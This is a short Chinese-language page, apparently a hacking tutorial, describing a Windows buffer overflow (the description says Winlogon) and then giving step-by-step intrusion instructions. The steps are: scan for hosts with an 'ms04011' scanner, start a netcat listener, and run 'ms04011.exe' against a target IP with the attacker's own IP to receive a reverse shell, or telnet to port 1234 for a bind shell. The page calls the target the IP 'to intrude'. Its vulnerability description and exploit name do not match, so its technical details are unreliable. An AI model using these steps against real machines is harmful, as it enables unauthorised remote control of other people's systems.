受影響系統(tǒng)：
Microsoft Windows XP
Microsoft Windows NT 4.0
Microsoft Windows 2000
描述：

Microsoft Windows Winlogon存在進(jìn)程一個(gè)緩沖區(qū)溢出，遠(yuǎn)程攻擊者可以利用這個(gè)漏洞可能以進(jìn)程權(quán)限執(zhí)行任意指令。

由于Winlogon在登錄過程中使用的數(shù)據(jù)值大小沒有進(jìn)行任何檢查就插入到分配的緩沖區(qū)中，可導(dǎo)致發(fā)生緩沖區(qū)溢出，精心構(gòu)建提交數(shù)據(jù)可能以進(jìn)程權(quán)限在系統(tǒng)上執(zhí)行任意指令。

1 用ms04011漏洞掃描器掃出有漏洞的主機(jī)掃到有VULNERABLE字樣的說明主機(jī)有漏洞的可能性非常大

2 掃到后用NC來監(jiān)聽  nc -l -p 監(jiān)聽端口 -----按回車  或 nc -vv -l -p 監(jiān)聽端口

3 方式   ms04011.exe 0 要入侵的IP 監(jiān)聽端口 自己IP
         其中0 表示2000系統(tǒng) NT5.0          1表示XP系統(tǒng) NT5.1

或者----------------------------------------------

先ms04011.exe 0 要入侵的IP 
然后直接 telnet 要入侵的IP 1234。

最新評(píng)論